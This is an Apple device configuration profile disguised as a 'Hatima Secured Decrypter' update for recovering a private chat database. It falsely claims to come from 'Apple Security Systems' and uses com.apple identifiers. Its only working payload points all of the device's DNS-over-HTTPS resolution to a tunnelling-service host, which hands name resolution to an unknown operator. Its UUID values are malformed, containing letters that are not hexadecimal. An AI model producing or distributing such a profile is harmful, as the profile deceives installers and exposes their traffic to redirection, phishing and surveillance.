<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadDescription</key>
            <string>Configures secure DNS for identity verification.</string>
            <key>PayloadDisplayName</key>
            <string>Secure DNS Proxy</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.dnsSettings.managed.1</string>
            <key>PayloadType</key>
            <string>com.apple.dnsSettings.managed</string>
            <key>PayloadUUID</key>
            <string>D5E6F7G8-H9I0-J1K2-L3M4-N5O6P7Q8R9S0</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>DNSSettings</key>
            <dict>
                <key>DNSProtocol</key>
                <string>HTTPS</string>
                <key>ServerURL</key>
                <string>https://consuetudo.serveousercontent.com</string>
            </dict>
        </dict>
    </array>
    <key>PayloadDescription</key>
    <string>Hatima Secured Decrypter - Essential update to recover private chat database.</string>
    <key>PayloadDisplayName</key>
    <string>Hatima Secured Decrypter V3</string>
    <key>PayloadIdentifier</key>
    <string>com.apple.security.decrypter.v3</string>
    <key>PayloadOrganization</key>
    <string>Apple Security Systems</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>E5F6G7H8-I9J0-K1L2-M3N4-O5P6Q7R8S9T0</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
